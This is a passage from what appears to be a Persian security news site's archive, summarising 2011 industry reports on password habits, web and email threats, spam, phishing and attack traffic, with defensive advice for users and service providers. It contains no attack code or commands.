‫ اخبار

صفحات: «« « ... 46 47 48 49 50
Password use and management
Date: 2011-10-03
From logging on to a corporate network or conducting online banking, to accessing social media or unlocking a mobile phone, passwords are the default and almost ubiquitous first (and often only) line of security for online accounts. Depending upon how they are used and maintained, they can be a powerful first line of defence in protecting personal information and privacy or at worst a time-wasting interruption, lulling users into a false sense of security.
Confidentiality is one of the three aspects (along with Integrity and Availability) of trustworthy computing and a critical element of computer security. To work, it requires authentication mechanisms, such as passwords, to safeguard access to information. Traditionally, to ensure confidentiality of a system, two procedures are used: identification (User ID), to identify the user; and authentication, to verify that the user is the legitimate owner of the ID. It is the latter stage that requires a password.
Passwords are secret words or phrases and ideally should contain a string of letters, characters and numbers (this makes it harder to guess). They may be machine generated or allocated by the provider of the service, but in most cases are user-generated.
The types of passwords we select are dictated to some extent by the policies of the organisations with which we interact online. Some may require passwords of a minimum length; some may require a password of an exact length; some may force us to use numbers and characters; while others may have no overt structural requirements at all.
The following document outlines a survey commissioned by The Centre for Internet Safety (CIS) and PayPal, examining consumer behaviours and perceptions relating to their use of online passwords. We decided instead to focus on user behaviour and attitudes towards the use of passwords, such as whether the user considered them secure, and their habits relating to remembering and changing them. We asked a broad cross section of Australians about their attitudes to password security. The survey was completed by over 1000 respondents, with an even split of male/female respondents. At the end of this document is a simple guide to generating and maintaining safer passwords, but at a minimum they should:
· not be a proper noun
· not be a common word (out of the dictionary), and
· not be identifiable in relation to the user ID.
How criminals abuse passwords
Online criminals capture passwords in several ways, each necessitating different security behaviours on the part of both the consumer and the provider of the online service.
1. Trickery
Online criminals may manufacture an email address and/or a website mimicking a real company, and convince users to enter or provide their passwords (phishing), or convince the password owner to disclose passwords by providing a plausible story or reason (social engineering).
Consumer defence: Type in the URL of the legitimate website and implement security software to identify false websites. Consider the legitimacy of emails and other approaches.
Service provider defence: Actively monitor for fake websites and spam emails using your brand. Work with CERTs and security companies to take down and block offending sites where possible. Build internal capacity to monitor user accounts for anomalous behaviour.
2. Theft
Online criminals may deploy malicious computer software onto victim computers, or the websites they use, in order to steal passwords (and other information).
Consumer/service provider defence: Implement security software, educate system users, regularly patch operating system and applications.
3. Gaming
Online criminals may present themselves to the company providing the online service and pretend to have forgotten “their” password. They then provide the necessary personal details (like answers to the “secret question”) to have a new password issued to them.
Consumer defence: Choose a secret question it is likely only you know the answer to (do not have the answer contained on any social networking site, for example).
Service provider defence: Tighten automated forgotten password processes and educate frontline customer support staff. Build internal capacity to monitor user accounts for anomalous behaviour.
4. Guessing
Online criminals may attempt to access accounts by entering common passwords or by using information they know about the user to guess their password (for example, knowing their favourite football team) – often this information is now obtained from social networking sites.
Consumer defence: Choose a password that is difficult to guess, including numbers and characters. Do not have a password that relates to any personal information readily identifiable via social networking sites.
Service provider defence: Limit the number of failed login attempts allowed. Implement minimum standards for consumer password strength.
5. Brute force attack
Cyber criminals bombard the online service with passwords until the correct password is entered.
Service provider defence: Limit the number of failed login attempts allowed. Implement minimum standards for consumer password strength.
Nearly two thirds (63%) of respondents use the same password across more than one online account. Interestingly, this number grows to 77% when looking at the 18-24 year old category. This finding suggests that many Internet users underestimate the threat from cyber criminals who abuse this habit: stealing passwords via one site and then attempting to replay them across others.
Critical to the use of the same password for multiple login’s is how often users change their passwords. Nearly half (48%) of respondents said they only changed their passwords when required to by a system. 7% never do.
While time consuming – and possibly resulting in more forgotten passwords initially – regularly changing passwords can be a very effective tool in keeping accounts secure. Since there is an active blackmarket trade in passwords between criminals, the habit of changing passwords degrades the value of that criminal economy: the stolen password is useless once it has been changed by the owner.
Password guessing attacks can be mitigated by consumers ensuring that passwords are sufficiently complex and by system operators limiting the frequency of authentication attempts. A pleasing result is that over three quarters (78%) of respondents said their passwords didn’t contain any personally identifying information.
Only 10% of respondents thought their online passwords could be easily guessed.
These two last results is in contrast to analysis of large scale public password breaches (such as Sony’s recent losses, and others from web based email services and social networking sites). Analysis of those breaches show users still use dictionary words, names and nicknames and rarely use numbers and symbols.
In a more troubling set of results, 41% of survey respondents (63% of 18-24 year olds) have shared their password with a friend, family member or work colleague, with only one third (36%) having changed the password since sharing.
46% of respondents store their passwords on a piece of paper. In itself, this is a harmless practice assuming that the piece of paper is not stuck to the computer hardware and is stored in a separate location. 18-24 year olds use paper to store their passwords, but they also like to store passwords on their mobile phones.
41% of respondents forget at least one of their online passwords once a month and have a new one emailed to them. Social engineering attacks, in particular phishing attacks, often pretend to be an official system administrator seeking to trick a user into resetting a password.
It was pleasing to discover nearly all (96%) of respondents say they take care to protect their personal information when using a public computer, like those found in a library, internet café or an airline lounge. It is unclear how they actually protect themselves, however, as using such services is inherently risky. In addition, over a third (36%) never ticked ‘yes’ when asked by a website to remember their details. Some websites have this option pre-selected and can easily fool a user. This is a critical issue for those using shared or public computers, as the next user may be able to gain access to the previously logged in application.
A third (36%) of respondents remain logged into online accounts, such as social media, including on their mobile phones. 76% of 18-24 year olds remained logged into such online accounts. This is potentially dangerous, especially if the phone is not locked (or set to auto lock within a short period).
Guide to creating and managing a secure password
1. Take stock of your current passwords
· The first step is to work out how many passwords you actually have – this can take time, as most people have a number of accounts online, ranging from bank accounts to social media platforms to newsletters
· Allocate a unique password to each account – do not use the same password across multiple online accounts
2. Create your passwords
· When creating a password, do not use personal information such as your name, your address, your birthday, your nickname, pet’s or children’s names, or your place of work.
· Avoid using words you can find in a dictionary, people’s names, or phrases that can be easily guessed.
· Choose a password with the following criteria: at least 1 number, 1 special character, 1 uppercase letter, and ensure it is at least 8 characters long.
Here is one way of generating a harder to guess password:
· Think of a phrase like “I love it when it rains on weekends!”
· Take the first letter from each word: Iliwirow!
· Convert the letter “o” to a zero: Iliwir0w!
· We now have a 9 character password with a capital, a number and a special character
3. Manage your passwords
· Never share your password with anyone. Simple.
· Change your passwords regularly – not only when you are prompted to change them by your online accounts. A good start is to change all your online passwords when daylight saving time comes into effect and stops.
· When entering your password on a public computer, be aware that others may be watching you type or recording what you are doing using malware. Change your password asap upon returning to your usual computer.
· If you can’t remember all your passwords, avoid saving them on your desktop or your mobile device, but rather write them down and keep this in a safe place away from your computer.
11 مهر 1390 برچسب‌ها: گزارشات تحلیلی
Security threat report of Sophos in mid-year 2011
Security threat report of Sophos in mid-year 2011
The security company Sophos has studied the security threats of the first half of 2011 in a report. The following report is briefing that.
1)Web Threats: A new threat every 4.5 seconds
Cybercriminals take advantage of our almost constant use of the web to launch malicious attacks. As a result, the web remains the biggest way cybercriminals distribute their malicious goods. During the first half of 2011, we saw an average of 19,000 new malicious URLs every day—that's one every 4.5 seconds.
Many computer users still don’t realize that something nasty can infect their computer when they visit a seemingly legitimate website. Yet more than 80% of the malicious URLs we found are legitimate websites hacked by cybercriminals. They achieve this by exploiting vulnerabilities in the software or by stealing access credentials from malware infected machines.

The U.S. still holds the top spot on the list of countries hosting malware, although the total percentage of malware hosted by the U.S. declined slightly during the first half of 2011, down 1.4 points from 39.39% in 2010. The Russian Federation now claims the number two spot, a position held by France last year.

Fake Antivirus: Security scams reap millions
In 2010, fake antivirus was one of the more persistent threats of the year. In the first half of 2011, fake antivirus remained a threat, and these attacks are now actively targeting Mac users.
Many fake antivirus scams still target Windows users, and we see Mac fake antivirus software spreading in greater numbers than ever before. In some cases, scammers infect Macs to automatically open pornographic websites periodically—as further incentive to have users purchase the so-called "fix."
SEO Poisoning: Gateway for malicious behavior
The search engine is our gateway to the webThat’s why cybercriminals manipulate search results from sites such as Google, Bing and Yahoo to lure victims to their malicious pages. Search engine optimization, or SEO, is a standard Internet marketing technique used by most companies to draw people to their sites. But it can also be abused. When the bad guys exploit SEO, it’s known as SEO poisoning, or Black Hat SEO.
Attackers use SEO poisoning techniques to rank their sites highly in search engine results and to redirect users to malicious sites.

Black Hat SEO attacks are extremely effective. A snapshot of the top malware we block on our customer web appliances shows that Black Hat SEO accounts for more than 30% of all detections.

2)Operating Systems (OS): Mac malware is now real

We ran a poll on the Sophos Facebook page asking folks if they would now recommend that friends and family install antivirus software on their Macs. Of the 968 people who answered the poll, 89% said yes.

Microsoft Windows: Malware targeting Windows XP still dominates

The most recent report, Microsoft’s tenth Security Intelligence Report, shows an increase in malware targeting Windows 7, which is now installed in about a quarter of all Windows computers. Although there was a drop-off in new malware targeting XP, used by about half of all Windows users, Windows XP malware still accounts for the majority of malware written for Windows to date.

3)Mobile: Mini computers in your pocket

A recent Sophos survey asked IT security professionals across multiple countries about mobile device use and access to corporate resources. Out of more than 240 responses, all but 6% said that they allow mobile devices to access corporate resources. Access for BlackBerry and Windows mobile phone OS ranked highest.

The survey also revealed that over 85% of organizations have already established an acceptable use policy (AUP) within their organizations, yet only 69% of these organizations have specific policies for company-owned mobile device users. And, this number further decreases when you consider policy for employee-owned mobile devices (31%).

4)Social Networking: Threats explode, so limit access to personal info
To see just how many security issues social networks pose, we recently conducted a social media poll that asked whether respondents’ organizations have encountered spam, phishing or malware incidents. Of the nearly 2,000 people polled, 71% reported that they, or one of their colleagues, had been spammed on a social networking site, 46% had been phished and 45% were sent malware. The remaining respondents were divided—some were not victims, others were unsure.

Our recent social networking poll also asked computer users which social network they felt posed the biggest security risk. Facebook is clearly seen as the biggest risk with 81% of the votes, a significant rise from the 60% who felt Facebook was the riskiest when we first asked the question a year ago. Twitter and MySpace each received 8% of the votes this year, and LinkedIn only 3%.

5)Email Spam and Spearphishing: Still a threat
A recent comScore report shows a whopping 59% decline in the use of email among 12- to 17-year olds, and a 34% decline for the 25 to 34 age bracket. Facebook, text messaging and Twitter have taken over as preferred communication methods for many.
As compared to 0.27% of email attachments containing threats in the first quarter of 2010, just 0.16% contained threats in the first quarter of 2011. Scammers now use more HTML attachments rather than just “.exe” executable files as vehicles to deliver malware.

The U.S. once again leads the field of spam-relaying countries, contributing approximately 13% of the world's spam traffic in the first half of 2011. India, Russia, South Korea and Brazil broke through the 6% barrier during the first six months of the year, with their massive online populations clearly lacking the protection needed to keep their systems free from spamming malware.

6)Removable Media: Beware of Windows Autorun
Between March and May of this year, there was a significant drop in the number of computers being infected by malware exploiting the Windows Autorun feature. Autorun infections dropped by 59% on XP machines and by 74% on computers running Windows Vista.

However, a recent study conducted by the U.S. Department of Homeland Security (DHS) discovered that the biggest risk from removable media might come from poor decision-making by users. According to a Bloomberg report, the DHS study found that government employees showed carelessness in using thumb drives and CDs.

Security Threat Report, Mid-Year 2011, Sophos
6 شهریور 1390 برچسب‌ها: گزارشات تحلیلی
The State of the Internet, 1st Quarter of 2011
Date: 2011-08-03
Each quarter, Akamai Technologies publishes "State of the Internet" report. Akamai’s globally distributed network of servers allows them to gather massive amounts of information on many metrics, including connection speeds, attack traffic, and network connectivity/ availability/ latency problems, as well as traffic patterns on leading Web sites.This report includes data gathered from across Akamai’s global server network during the first quarter of 2011 about attack traffic, broadband adoption, and mobile connectivity, as well as trends seen in this data over time.
Attack Traffic, Top Originating Countries
During the first quarter of 2011, Akamai observed attack traffic originating from 199 unique countries/ regions, down from 207 at the end of 2010. As shown in the following figure, the first quarter saw several changes in the list of the top 10 attack traffic sources, with Myanmar making its first appearance in the history of the report, India appearing for the first time since the fourth quarter of 2009, and Hong Kong appearing for the first time since the third quarter of 2008. Among the countries/ regions more frequently seen on the top 10 list, the United States and Taiwan were responsible for higher percentages of attack traffic as compared to the prior quarter, while Russia, China, Brazil, Romania, and India all saw their percentages decline quarter-over-quarter.
This sudden appearance of Myanmar on the list of top attack traffic sources is certainly unusual, and appears to be related to attack traffic targeting Port 80 observed by Akamai in late February and early March. Interestingly, Myanmar managed to be responsible for 13% of the observed attack traffic in the first quarter even though only 25 unique ports were targeted, and of that, over 45% of the attacks targeted Port 80. Contrast that with the United States, with 10% of the observed attack traffic and tens of thousands of targeted ports – very strongly indicative of general port scanning activity, as opposed to specifically targeted attacks.
Aggregating observed attack traffic at a continental level, we find that nearly half of the observed attack traffic came from the Asia Pacific/Oceania region, nearly 30% came from Europe, and just over 20% came from the Americas.
Attack Traffic, Top Ports
Attack traffic concentration among the top 10 ports continued to drop from the concentration seen in the fourth quarter of 2010, with the top 10 ports responsible for just 65% of the observed attacks (down from 72% in the fourth quarter). Perpetual top target Port 445 (Microsoft- DS) dropped nearly 25% from the prior quarter, and Ports 23 (Telnet) and 22 (SSH) also saw significant percentage declines. However, Port 80 (WWW) saw attack traffic levels over 7x higher than at the end of 2010, and the percentage of attacks targeting Port 443 (HTTPS/SSL) also saw a massive increase over the prior quarter. As noted above, it is likely that the growth in attack traffic targeting Port 80 and Port 443 is related to the attacks observed to be originating from Myanmar and Hong Kong.The ongoing decline of attacks on Port 445 continues to underscore the success of efforts to mitigate the threat posed by the Conficker worm, which is now over three years old. A report released2 by the Conficker Working Group in January 2011 claimed success in ultimately stopping Conficker from communicating with its creator, thus preventing it from updating into newer and more dangerous variants, though it also noted that Conficker still resides on anywhere from four million to 13 million computers across the world.
As shown in the top figure, in addition to Port 443’s first appearance in the list, Port 21 appears on the top ports list for the first time this quarter as well.
Attack Traffic From Mobile Networks, Top Originating Countries
In reviewing Figure 21, we find that the distribution of attack traffic sourced in mobile networks during the first quarter of 2011 had a fairly similar distribution to that seen in the prior quarter, though some countries saw slightly higher percentages, while others were slightly lower. Italy remained responsible for the largest percentage of observed attacks, but dropped to 25% (from 30%) this quarter. Of the top 10 countries, eight of them were also found on the list last quarter – the United Kingdom and Russia dropped out of the top 10, while Argentina and Australia replaced them on the list. The top 10 countries were the source of just under three-quarters of observed attacks.
Attack Traffic From Mobile Networks, Top Ports
In the first quarter of 2011, nine of the top 10 ports targeted by attack traffic sourced in mobile networks were the same as in the fourth quarter of 2010. In this quarter, Port 5900 (VNC Server) dropped from the list, replaced by Port 443 (HTTPS/SSL). The appearance of Port 443 on this list is in line with the massive growth in overall attack traffic targeting the port noted in Section 1.2 above. As shown in Figure 22, attack concentration continued to grow in the first quarter, with Port 445 responsible for 80% of the observed attacks, and the top 10 ports responsible for just over 97% of observed attacks. Interestingly, China was the only country among the top 10 that did not originate any attack traffic targeting Port 445.
The State of the Internet, 1st Quarter, 2011 Report, Volume 4, Number 1
11 مرداد 1390 برچسب‌ها: گزارشات تحلیلی
Web Application Attacks
Date: 2011-07-31
Web applications, on average, experience twenty seven attacks per hour, or roughly one attack every two minutes, according to Imperva. They observed and categorized attacks across 30 applications as well as onion router (TOR) traffic, monitoring more than 10 million individual attacks targeted at web applications over a period of six months.

The analysis shows:
  • When websites came under automated attack they received up to 25,000 attacks in one hour, or 7 attacks every second.
  • Four dominant attack types comprise the vast majority of attacks targeting web applications: Directory Traversal, Cross-Site Scripting, SQL injection, and Remote File Inclusion.

Modern botnets scan and probe the Web seeking to exploit vulnerabilities and extract valuable data, conduct brute force password attacks, disseminate spam, distribute malware, and manipulate search engine results.

These botnets operate with the same comprehensiveness and efficiency used by Google spiders to index websites. Further, automation also means that attacks are equal opportunity offenders - they do not discriminate between well-known and unknown sites or enterprise-level and non-profit organizations.

Over 61 percent of the attacks monitored originated from bots located in the United States, although conclusions cannot be made regarding from which geography these bots are controlled.

Attacks from China made up almost 10 percent of all attack traffic, followed by attacks originating in Sweden and France.

According to the data, the amount of XSS traffic is growing:

Below you can see the distribution of search engine crawlers observed following the maliciously-crafted XSS links.

According to this comparison, Yahoo is the most susceptible to SEP-related XSS, while Google apparently filters most of these links.

Technical recommendations

Automated attack detection requires collecting data, combining it and then analyzing it automatically in order to extract relevant information and apply security countermeasures. Gathering the required data requires monitoring protocol anomalies even if they are not malicious or if the web application is not vulnerable.

Combining this data with intelligence gathered on known malicious sources will help enlarge the knowledge base for identifying attacks and selecting appropriate attack mitigation tools. Here are 5 tips for the security team:

1. Deploy security solutions that deter automated attacks.

2. Detect known vulnerabilities attacks - the security organization needs to be aware of known vulnerabilities and have an up-to-date list to know what can and will be exploited by attackers.

3. Acquire intelligence on malicious sources and apply it in real time.

4. Participate in a security community and share data on attacks.

5. Detect automated attacks early - quickly identifying thousands of individual attacks as one attack allows you to prioritize your resources more efficiently and can help in the detection of previously unknown attack vectors included in the attack.
Imperva’s Web Application Attack Report, Edition #1 - July 2011
9 مرداد 1390 برچسب‌ها: گزارشات تحلیلی
Internet Threats Trend Report, 3rd Quarter of 2011
Date: 2011-07-27
The Commtouch Labs have studied the trend of the Internet threats in the second quarter of 2011. You can read the brief report here.
Spammer tactics are changing
In mid-March, Microsoft led a takedown of the Rustock botnet. The immediate effect on spam levels was a drop of nearly 30% to an average of 119 billion messages per day during the last two weeks of March. In the past, botnet takedowns have resulted in temporary drops in spam levels followed by sustained increases, as spammers created new botnets and resumed mass mailings. The spam levels of this quarter however, suggest that the expected “recovery” of spam might not occur in the near term, and that spammers are changing their tactics. Average daily spam levels for the past year are shown below:

June’s spam level (106 billion) is the lowest in over 3 years. At its lowest point in June, spam accounted for 75% of all emails.
The new tactic therefore calls for the use of compromised accounts to send spam as opposed to using botnets. The move away from botnet spam can be attributed to the use of IP reputation mechanisms that have been increasingly successful in blacklisting zombie IP addresses and therefore blocking botnet spam. The blocking of spam from compromised accounts based on IP address is more difficult for many anti-spam technologies, since these accounts exist within whitelisted IP address ranges.
While spam from compromised accounts is less likely to get blocked by IP reputation systems, the volumes that can be sent are lower due to the thresholds imposed on these accounts. This at least partially accounts for the lower spam volumes seen this quarter.
Analysis of compromised accounts
In addition to the spoofed emails (shown above), a percentage of the emails from Gmail and Hotmail actually come from genuine accounts. These can be compromised accounts or accounts specifically created by spammers for this purpose. The graph below illustrates the percentage of spam received over a trial period this quarter where the “from” field includes Gmail and Hotmail. Based on the IP address, received spam could either be:
  • Sent from a zombie with a phony Gmail or Hotmail address in the from field
  • Or, sent from a compromised or spammer account at Gmail or Hotmail
As shown, almost 30% of the spam from Hotmail actually comes from compromised or spammer Hotmail accounts. Gmail spam, on the other hand, is mostly from zombies that simply forge their Gmail addresses.

Spam topics
Pharmacy spam remained in the top spot but continued to drop this quarter to only 24% (down from 28% in Q1 2011). 419 fraud, phishing, and pornography all increased.

Malware trends
The second quarter included malware distributed using a variety of methods - several of these are shown below.
SEO poisoning leads to fake antivirus
One of the methods of distributing malware is the use of SEO (Search Engine Optimization) technique and pushing fake antivirus links in the search results.
PDF malware
PDF files as well as executables disguised as PDF files were used in numerous attacks during Q2 2011. Two examples are shown below.In the first example the zip file extracts to an executable file, but the icon shown is of an Adobe Acrobat PDF file. Users with file extension view disabled on their computers, will see a PDF icon and think the file is simply a PDF. When the file is executed, it will show a non-malicious PDF file in a fake PDF reader window.
The malware then does the following:
  • Captures all keystrokes and activities as users browse the internet.
  • Saves the stolen keylogging information in the file on the user’s hard drive – “updates2.txt”.
  • Sends the keylogger file to the malware owner via e-mail.
The second example of PDF malware uses complex coding to hide a malicious JavaScript within the PDF file.
Web Security
Compromised sites
Cybercriminals often hack websites to hide phishing pages or malware. This provides them with two main advantages:
1) The legitimate domain probably has a good reputation from the point of view of most URL filtering engines and is therefore not likely to be blocked.
2) The compromised site provides free hosting for the malware or phishing page.
The following table shows the categories of sites that have been compromised.

Phishing Trends
Phishing attacks continued to target local and global banks, Web email users, Facebook accounts, and even online gaming sites.
In order to provide protection from keyloggers, some financial institutions have added more complex login pages including virtual keyboards. Phishers have kept up with this trend. The phishing page for ADCB (Abu Dhabi Commercial Bank) successfully simulated the virtual keyboard found on the real site.
During the second quarter of 2011, sites related to games were the greatest target of phishing attacks. The following table shows the categories of sites that have been target of phishing attacks.

Zombie trends
The second quarter saw an average turnover of 377,000 zombies each day that were newly activated for malicious activity, like sending malware and spam. This number shows a substantial increase compared to the 258,000 of the first quarter of 2011.
The following chart shows the newly activated zombies from April to June 2011.
India again claimed the top zombie producer title hosting 17% of the global zombie population. Brazil, Vietnam, and the Russian federation stand at the next places.
India again claimed the top zombie producer title hosting 17% of the global zombie population. Brazil, Vietnam, and the Russian federation stand at the next places.

Internet Threats Trend Report, July 2011, Commtouch

5 مرداد 1390 برچسب‌ها: گزارشات تحلیلی
The state of spam in May
Date: 2011-06-23
The security company AppRiver has studied the state of spams in May. You can read the report below.
Total Email Traffic Volume
This chart represents both total and spam traffic throughout the month of May. Spam traffic remained level this month, totaling 2.95 billion messages.

Regions of Origin
This graph represents both spam and malicious email traffic by region. Spam output from Asia increased in May. We also saw a slight increase in spam output from Australia and Oceania.

Top Ten Countries of Origin
This chart represents the top countries from which spam originated during May. For the second consecutive month, Russia held the top spot as the number one country for spam origination. Also, Brazil’s output surpassed the US for the first time in many months.

Top Email-Delivered Viral Threats
These are the top 20 malware threats we saw last month in order of frequency, with the most frequent appearing in the top position. The virus names that begin with “X.” signify rules that were written by AppRiver Analysts.

30 Day Virus Activity
This chart represents email-borne virus and malware activity during the month of May as seen by AppRiver filters. For the fifth straight month we saw email-borne virus messages more than double in quantity. In May, we quarantined more than 102 million email-borne virus messages, an increase of 239% over April 2011. In fact, May 1st 2011 was the largest volume of these messages that we have seen in a single day in nearly two years.

Image Spam
The chart below represents total Image spam seen by AppRiver filters during May. The obfuscation tactic of using image attachments in an attempt to deliver spam content decreased slightly this month.

You Are Under Surveillance
In the beginning of May, we noticed an interesting malware campaign that had begun early in the morning of May 3rd. The emails claimed to have come from the FBI and delivered a warning that, even though they didn't seem to know who they had sent the email to, the FBI was busy monitoring your Internet activities. The email explains that they had logged recipients’ IP address at more than 40 illegal websites and requested readers to fill out the attached “questionnaire.” It was entitled document.zip, and even though the file within the zip was an executable (.exe), it was wearing the costume of a .pdf icon. The file was not a questionnaire, but instead a malicious downloader from the Bredolab family.

Zeus Poses as Fake Microsoft Security Update
May 10th was patch Tuesday and in addition to the real thing, cybercriminals had their own "security" offering. Messages circulated, claiming to be a security update from Microsoft. Such messages began on May 6th and continued to hit our filters with regularity until one week later.
The messages were spoofed to appear from Microsoft and had the subject “URGENT: Critical Security Update”. Messages professed to contain a “Security Update for Microsoft Windows OS”. Ironically, the email states that the update will prevent malicious users from gaining access to your computer files, when in reality it would do just the opposite. The attachment was in fact another variant of the Zeus Trojan.

AppRiver, Threat and Spamscape Report, June 2011

1 تیر 1390 برچسب‌ها: گزارشات تحلیلی
Microsoft Security Report, Second Half of 2010
Volume 10 of the Microsoft Security Intelligence Report (SIRv10) provides in-depth perspectives on software vulnerabilities, software vulnerability exploits, malicious and potentially unwanted software, and security breaches in both Microsoft and third party software. Microsoft developed these perspectives based on detailed trend analysis over the past several years, with a focus on 2010.
Vulnerability Severity
The following figure shows Industry-wide vulnerability disclosures by severity, since 2006.

Although the number of Medium and High severity vulnerabilities disclosed is routinely much greater than the number of Low severity vulnerability disclosures, the trend in 2010 is a positive one, with Medium and High disclosures declining by 17.5 percent and 20.2 percent from 2009, respectively. Low severity vulnerability disclosures increased 45.8 percent, from 190 in 2009 to 277 in 2010.
Vulnerability Complexity
Some vulnerabilities are easier to exploit than others, and vulnerability complexity is an important factor to consider in determining the magnitude of the threat that a vulnerability poses. A High severity vulnerability that can only be exploited under very specific and rare circumstances might require less immediate attention than a lower severity vulnerability that can be exploited more easily.
The following figure shows the complexity mix for vulnerabilities disclosed each year since 2006. Note that Low complexity indicates greater danger, just as High severity indicates greater danger in the past figure.

As with vulnerability severity, the trend here is a positive one, with Low and Medium complexity vulnerability disclosures declining 28.3 percent and 5.0 percent from 2009, respectively. High complexity vulnerability disclosures increased 43.3 percent, from 120 in 2009 to 172 in 2010.
Operating System, Browser, and Application Vulnerabilities
The following figure shows industry-wide vulnerabilities for operating systems, browsers, and applications since 2006.
Application vulnerabilities continued to account for a large majority of all vulnerabilities in 2010, although the total number of application vulnerabilities declined 22.2 percent from 2009. Operating system and browser vulnerabilities remained relatively stable by comparison, with each type accounting for a small fraction of the total.

Vulnerability Disclosures
The following figure charts vulnerability disclosures for Microsoft and non-Microsoft products since 2006.

Vulnerability disclosures across the industry were down 16.5 percent in 2010 from 2009.
Vulnerability disclosures for Microsoft products increased slightly in 2010 but have generally remained stable over the past several periods. Vulnerabilities in Microsoft products accounted for 7.2 percent of all vulnerabilities disclosed in 2010.
The following figure shows the prevalence of different types of exploits for each quarter in 2010.

In 3Q10, the number of Java attacks increased to fourteen times the number of attacks recorded in 2Q10, driven mostly by the exploitation of a pair of vulnerabilities in versions of the Sun (now Oracle) JVM. Together, these two vulnerabilities accounted for 85 percent of the Java exploits detected in the second half of 2010.
Exploits that target document editors and readers, such as Microsoft® Word and Adobe Reader, declined in 2Q10 and remained at a lower level thereafter.
Security Breach Trends
The following figure shows security breach incidents by incident type from 3Q09 to 4Q10.
Malicious incidents (those involving “hacking” incidents, malware, and fraud) routinely account for less than half as many incidents as negligence (involving lost, stolen, or missing equipment; accidental disclosure; or improper disposal).
Malware and Potentially Unwanted Software
The information in this section was compiled from telemetry data that was generated from more than 600 million computers worldwide.
Global Infection Rates
The following table shows the locations with the most computers reporting detections and removals by Microsoft desktop antimalware products in 2010.
Detections in Korea rose 56.8 percent from 3Q10 to 4Q10. Detections in Russia rose 41.3 percent from 3Q to 4Q, primarily because of a significant increase in the number of computers running Microsoft Security Essentials there.
In absolute terms, the locations with the most computers reporting detections tend to be ones with large populations and large numbers of computers.
Operating System Infection Rates
The following figure shows the infection rate for each Windows operating system/service pack combination that accounted for at least 0.1 percent of total MSRT executions in 2010.
This data is normalized: the infection rate for each version of Windows is calculated by comparing an equal number of computers per version (for example, 1,000 Windows XP SP2 computers to 1,000 Windows 7 RTM computers).
As in previous periods, infection rates for more recently released operating systems and service packs are consistently lower than earlier ones, for both client and server platforms. Windows 7 and Windows Server 2008 R2, the most recently released Windows client and server versions, respectively, have the lowest infection rates on the chart.
Infection rates for the 64-bit versions of Windows Vista® and Windows 7 are lower than for the corresponding 32-bit versions of those operating systems.

Threat Categories
The Microsoft Malware Protection Center (MMPC) classifies individual threats into types based on a number of factors, including how the threat spreads and what it is designed to do. To simplify the presentation of this information and make it easier to understand, these types are grouped into 10 categories based on similarities in function and purpose.
The following figure shows detections by threat category each quarter in 2010, by percentage of all computers reporting detections.

Totals for each time period may exceed 100 percent because some computers have more than one category of threat detected and removed from them in each time period.
The miscellaneous trojans category, which consists of all trojans that are not categorized as trojan downloaders & droppers, was the most prevalent category each quarter in 2010, with detections on 20.0 percent of all infected computers in 4Q10, down from 22.7 percent in 1Q10.
Rogue Security Software (Scareware)
Rogue security software, is software that appears to be beneficial from a security perspective but provides limited or no security, generates erroneous or misleading alerts, or attempts to lure users into participating in fraudulent transactions.
The following figure shows detection trends for the most common rogue security software families detected in 2010.

Email Threats
Spam Messages Blocked
The information in this section is compiled from telemetry data provided by Microsoft Forefront Online Protection for Exchange (FOPE), which provides spam, phishing, and malware filtering services for thousands of enterprise customers and tens of billions of messages per month.
The following figure shows messages blocked by FOPE each month in 2010.

After increasing gradually and then reaching a plateau through the first eight months of 2010, the number of spam messages received and blocked by FOPE dropped abruptly in September, and again in December. These drops can be correlated with events involving two of the world’s most significant spam-sending botnets: During the last week of August, researchers affiliated with the security firm LastLine spearheaded a coordinated takedown of command-and-control (C&C) servers associated with the Cutwail spambot. Also around December 25, spam researchers around the world recorded an almost complete cessation of spam originating from the large Rustock botnet. The botnet subsequently began sending spam again in mid-January.
Spam Types
The FOPE content filters recognize several different common types of spam messages. The following figure shows the relative prevalence of these spam types in 2010.

Advertisements for nonsexual pharmaceutical products accounted for 32.4 percent of the spam messages blocked by FOPE content filters in 2010. Together with nonpharmaceutical product ads (18.3 percent of the total) and advertisements for sexual performance products (3.3 percent), product advertisements accounted for 54.0 percent of spam in 2010
In an effort to evade content filters, spammers often send messages that consist only of one or more images, with no text in the body of the message. Image-only spam messages accounted for 8.7 percent of the total in 2010.
1 خرداد 1390 برچسب‌ها: گزارشات تحلیلی
The State of the Internet, 4th Quarter of 2010
Date: 26/02/90
Each quarter, Akamai Technologies publishes "State of the Internet" report. Akamai’s globally distributed network of servers allows them to gather massive amounts of information on many metrics, including connection speeds, attack traffic, and network connectivity/ availability/ latency problems, as well as traffic patterns on leading Web sites.This report includes data gathered from across Akamai’s global server network during the fourth quarter of 2010 about attack traffic, broadband adoption, and mobile connectivity, as well as trends seen in this data over time.
Attack Traffic, Top Originating Countries
During the fourth quarter of 2010, Akamai observed attack traffic originating from 207 unique countries/regions, down just two from the third quarter. While the list of countries/regions comprising the top five remained constant from quarter-to-quarter, a shift in the rankings clearly occurred, as shown in the chart. Most notably, the United States dropped to fifth place globally, the source of 7.3% of the observed attack traffic. Russia shifted into first place, responsible for approximately 12% more of the observed traffic in the fourth quarter than in the prior quarter. For most of the remaining countries, the quarterly changes in attack traffic percentages were mixed, though none of the variations were significant.

Attack Traffic, Top Ports
Attack traffic concentration among the top 10 targeted ports dropped significantly from the third
quarter, with the top 10 ports responsible for just 72% of the observed attacks (down from 87% in the third quarter of 2010). This difference is mostly accounted for by the continued decline in the percentage of attacks targeted at Port 445 (Microsoft-DS), down from 56% to 47%, and Port 23 (Telnet), down from 17% to 11%, as shown in the chart.

Internet Penetration
As shown in Figure below, the top 10 countries remained the same quarter over quarter. Nine of the top 10 countries saw quarterly growth in the number of unique IP addresses observed by Akamai, ranging from an increase of under 1% in France to an 18% increase in South Korea. Yearly growth across all of the top 10 countries was strong, with double digit yearly increases seen in all countries but France. China’s growth rate has been consistently strong throughout 2010, with year-over year changes of 30% or more seen in all quarters. Concentration among the top 10 remained consistent with the past several quarters, accounting for nearly 70% of the observed IP addresses. In looking at the “long tail,” there were 183 countries/regions with fewer
than one million unique IP addresses connecting to Akamai in the fourth quarter of 2010, 132 with fewer than 100,000 unique IP addresses, and 30 with fewer than 1,000 unique IP addresses. The counts for all three thresholds were down quarter-over-quarter.
Global Average Connection Speeds
